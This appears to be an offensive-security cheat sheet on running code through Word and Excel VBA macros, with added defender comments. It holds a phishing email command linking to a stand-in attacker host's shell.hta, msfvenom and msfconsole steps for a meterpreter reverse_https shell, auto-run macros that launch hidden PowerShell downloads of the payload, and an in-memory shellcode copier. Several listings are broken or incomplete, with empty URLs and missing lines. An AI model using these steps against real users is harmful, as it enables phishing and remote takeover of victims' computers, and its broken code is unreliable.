Client Side Code Execution
VBA Macro in MS Office
Send email
sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"
Run from Web Server through Powershell In-Memory
python -m http.server 80
' MyMacro: payload routine called by the Document_Open and AutoOpen stubs below.
' NOTE(review): the listing is incomplete as extracted. `str` is declared, but the
' statement that opens the string literal and the statement that runs it are not
' shown, and the URL inside DownloadString('') is empty.
' Defender view: per the section heading this is a PowerShell download cradle
' started from Word. An Office process spawning powershell.exe is a high-signal
' event; PowerShell script block logging (event ID 4104) and AMSI can record the
' fetched script even though nothing is written to disk.
Sub MyMacro()
Dim str As String
' Tail of a PowerShell command string; the opening of the literal is not shown.
((New-Object System.Net.WebClient).DownloadString(''))"
End Sub
' Document_Open: Word event procedure that fires when the document is opened.
' It does nothing except forward to MyMacro.
' Defender view: this auto-run entry point only executes if macros are allowed.
' Current Office builds block macros in files carrying Mark of the Web by default,
' and the "Block macros from running in Office files from the Internet" policy
' enforces the same; auto-exec procedure names are also a common static indicator.
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
In-Memory Shellcode VBA Macro without .exe
.exe/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office
Workbook_Open() for Excel
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
' MyMacro (Function variant): copies the contents of `buf` to memory at `addr`,
' one byte per RtlMoveMemory call.
' NOTE(review): incomplete as extracted. `buf` and `addr` are never assigned, the
' For header matching `Next counter` is missing, and RtlMoveMemory is called
' without a visible Declare (only Sleep is declared above).
' Defender view: Declare PtrSafe ... Lib statements inside a document macro,
' combined with RtlMoveMemory, are strong static indicators. Office's AMSI
' integration inspects Win32 API calls made from VBA at run time, so this
' pattern is visible to endpoint tooling even with no file dropped.
Function MyMacro()
' Byte buffer to be copied; its contents are not shown on this page.
Dim buf As Variant
' Destination address; how it is obtained is not shown.
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
' Loop body: take one element of buf and copy 1 byte to addr + counter.
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
End Function
' Document_Open: Word event procedure run when the document is opened; it only
' calls MyMacro. It runs only when macros are enabled for the document.
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
VBA .exe Shellcode Download & Execute on Disk
.exe Shellcode Download & Execute on Disk
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run
python -m http.server 80
Sub Document_Open()
MyMacro
End Sub
' AutoOpen: Word auto macro run when the document is opened; it only calls
' MyMacro. Having both AutoOpen and Document_Open gives two triggers for the
' same routine, and both depend on macros being enabled.
Sub AutoOpen()
MyMacro
End Sub
' MyMacro: starts a hidden PowerShell one-liner that downloads msfstaged.exe,
' then waits two seconds.
' NOTE(review): the download URL in the string is empty ('/') and exePath is
' computed but not used in the lines shown; the listing appears truncated.
' Defender view: this variant touches disk, so it leaves more evidence than the
' in-memory one: an Office process spawning powershell.exe, an outbound HTTP
' request from PowerShell, and a new executable written to disk. The Defender
' ASR rules "Block all Office applications from creating child processes" and
' "Block Office applications from creating executable content" target this chain.
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('/', 'msfstaged.exe')"
' vbHide launches the process with a hidden window.
Shell str, vbHide
Dim exePath As String
' Expected location of the downloaded file: the folder holding the document.
exePath = ActiveDocument.Path + "\msfstaged.exe"
' Pause for 2 seconds via the Wait helper defined below (presumably to let the
' download finish; confirm against the full listing).
Wait (2)
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
Sub MyMacro()
Dim str As String
str = "powershell -c "IWR -Uri -OutFile msfstaged.exe"
Shell str, vbHide
Dim exePath As String
exePath = "C:\temp\msfstaged.exe"
Wait (2)
End Sub
